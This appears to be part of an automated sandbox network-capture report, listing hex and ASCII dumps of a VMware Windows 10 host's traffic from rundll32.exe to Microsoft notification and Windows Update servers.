                            2024-07-25 15:54:40 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 68 35 30 71 6c 4a 51 66 6e 30 75 31 49 70 73 67 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 63 34 63 35 61 31 31 33 33 39 38 65 33 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: h50qlJQfn0u1Ipsg.2Context: 37c4c5a113398e35<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:54:40 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 68 35 30 71 6c 4a 51 66 6e 30 75 31 49 70 73 67 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 37 63 34 63 35 61 31 31 33 33 39 38 65 33 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: h50qlJQfn0u1Ipsg.3Context: 37c4c5a113398e35<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            7 | 192.168.2.6 | 49717 | 40.113.110.67 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:54:41 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:54:41 UTC58INData Raw: 4d 53 2d 43 56 3a 20 63 2b 54 6f 6f 6e 58 52 33 30 61 61 59 5a 44 58 68 6a 58 51 62 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: c+ToonXR30aaYZDXhjXQbw.0Payload parsing failed.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            8 | 192.168.2.6 | 49719 | 40.113.110.67 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:55:03 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 47 2b 72 78 6c 2f 6b 52 41 45 4f 76 55 38 55 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 66 38 65 61 36 30 62 36 61 32 66 36 65 66 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: G+rxl/kRAEOvU8U3.1Context: 91f8ea60b6a2f6ef
                            2024-07-25 15:55:03 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:55:03 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 47 2b 72 78 6c 2f 6b 52 41 45 4f 76 55 38 55 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 66 38 65 61 36 30 62 36 61 32 66 36 65 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: G+rxl/kRAEOvU8U3.2Context: 91f8ea60b6a2f6ef<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:55:03 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 47 2b 72 78 6c 2f 6b 52 41 45 4f 76 55 38 55 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 31 66 38 65 61 36 30 62 36 61 32 66 36 65 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: G+rxl/kRAEOvU8U3.3Context: 91f8ea60b6a2f6ef<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            9 | 192.168.2.6 | 49719 | 40.113.110.67 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:55:03 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:55:03 UTC58INData Raw: 4d 53 2d 43 56 3a 20 79 44 30 31 4b 50 33 4d 7a 6b 2b 70 77 6f 58 36 7a 38 6d 42 54 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: yD01KP3Mzk+pwoX6z8mBTw.0Payload parsing failed.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            10 | 192.168.2.6 | 49720 | 52.165.165.26 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:55:09 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=O4c6ORKy9SdKx5O&MD=tSDbY3yp HTTP/1.1
                            Connection: Keep-Alive
                            Accept: */*
                            User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                            Host: slscr.update.microsoft.com


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            11 | 192.168.2.6 | 49720 | 52.165.165.26 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:55:09 UTC560INHTTP/1.1 200 OK
                            Cache-Control: no-cache
                            Pragma: no-cache
                            Content-Type: application/octet-stream
                            Expires: -1
                            Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                            ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                            MS-CorrelationId: f54582ed-3407-4bac-a203-861d6feec177
                            MS-RequestId: b53cfa9d-0d23-4602-a330-a89525db24df
                            MS-CV: R90JAJLm70myzTv6.0
                            X-Microsoft-SLSClientCache: 1440
                            Content-Disposition: attachment; filename=environment.cab
                            X-Content-Type-Options: nosniff
                            Date: Thu, 25 Jul 2024 15:55:08 GMT
                            Connection: close
                            Content-Length: 30005
                            2024-07-25 15:55:09 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                            Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                            2024-07-25 15:55:09 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                            Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            12 | 192.168.2.6 | 49722 | 40.113.110.67 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:55:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 2b 74 48 59 77 45 31 71 39 6b 57 78 4f 46 74 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 62 61 37 64 64 31 63 30 64 63 66 66 30 62 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: +tHYwE1q9kWxOFtS.1Context: a4ba7dd1c0dcff0b
                            2024-07-25 15:55:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:55:26 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 2b 74 48 59 77 45 31 71 39 6b 57 78 4f 46 74 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 62 61 37 64 64 31 63 30 64 63 66 66 30 62 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: +tHYwE1q9kWxOFtS.2Context: a4ba7dd1c0dcff0b<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:55:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 2b 74 48 59 77 45 31 71 39 6b 57 78 4f 46 74 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 34 62 61 37 64 64 31 63 30 64 63 66 66 30 62 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: +tHYwE1q9kWxOFtS.3Context: a4ba7dd1c0dcff0b<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            13 | 192.168.2.6 | 49722 | 40.113.110.67 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:55:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:55:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 31 63 5a 65 77 41 78 32 48 55 71 52 50 79 6e 44 4a 44 73 6c 2f 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: 1cZewAx2HUqRPynDJDsl/w.0Payload parsing failed.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            14 | 192.168.2.6 | 49725 | 40.113.110.67 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:55:53 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 75 6e 34 47 38 59 6b 4e 30 53 46 7a 50 72 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 63 62 31 31 66 65 34 31 66 65 32 62 65 31 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: Wun4G8YkN0SFzPrc.1Context: 79cb11fe41fe2be1
                            2024-07-25 15:55:53 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:55:53 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 57 75 6e 34 47 38 59 6b 4e 30 53 46 7a 50 72 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 63 62 31 31 66 65 34 31 66 65 32 62 65 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
                            Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: Wun4G8YkN0SFzPrc.2Context: 79cb11fe41fe2be1<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZcB2ZhkpVDhqCXM/AhcgkOxCTJjEFudgJ5fF8HecRn+WT2T47zmcwQbbCl794WABHqrEZgtFq5SnPhtKAJQMF+yWdJlPdvrlmZihr4rO7KNbb
                            2024-07-25 15:55:53 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 57 75 6e 34 47 38 59 6b 4e 30 53 46 7a 50 72 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 39 63 62 31 31 66 65 34 31 66 65 32 62 65 31 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: Wun4G8YkN0SFzPrc.3Context: 79cb11fe41fe2be1<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            15 | 192.168.2.6 | 49725 | 40.113.110.67 | 443 | 2144 | C:\Windows\SysWOW64\rundll32.exe
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:55:53 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                            Data Ascii: 202 1 CON 58
                            2024-07-25 15:55:53 UTC58INData Raw: 4d 53 2d 43 56 3a 20 4a 66 2f 72 69 6c 44 78 31 6b 36 44 33 54 55 56 48 36 53 43 4d 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                            Data Ascii: MS-CV: Jf/rilDx1k6D3TUVH6SCMA.0Payload parsing failed.


                            Session ID | Source IP | Source Port | Destination IP | Destination Port
                            16 | 192.168.2.6 | 49727 | 40.113.110.67 | 443
                            Timestamp | Bytes transferred | Direction | Data
                            2024-07-25 15:56:22 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 57 59 32 38 57 57 6c 4a 48 30 57 36 64 63 59 4c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 64 63 32 37 32 39 31 31 36 35 32 64 65 39 0d 0a 0d 0a
                            Data Ascii: CNT 1 CON 305MS-CV: WY28WWlJH0W6dcYL.1Context: 39dc272911652de9
                            2024-07-25 15:56:22 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                            2024-07-25 15:56:22 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 57 59 32 38 57 57 6c 4a 48 30 57 36 64 63 59 4c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 39 64 63 32 37 32 39 31 31 36 35 32 64 65 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 63 42 32 5a 68 6b 70 56 44 68 71 43 58 4d 2f 41 68 63 67 6b 4f 78 43 54 4a 6a 45 46 75 64 67 4a 35 66 46 38 48 65 63 52 6e 2b 57 54 32 54 34 37 7a 6d 63 77 51 62 62 43 6c 37 39 34 57 41 42 48 71 72 45 5a 67 74 46 71 35 53 6e 50 68 74 4b 41 4a 51 4d 46 2b 79 57 64 4a 6c 50 64 76 72 6c 6d 5a 69 68 72 34 72 4f 37 4b 4e 62 62
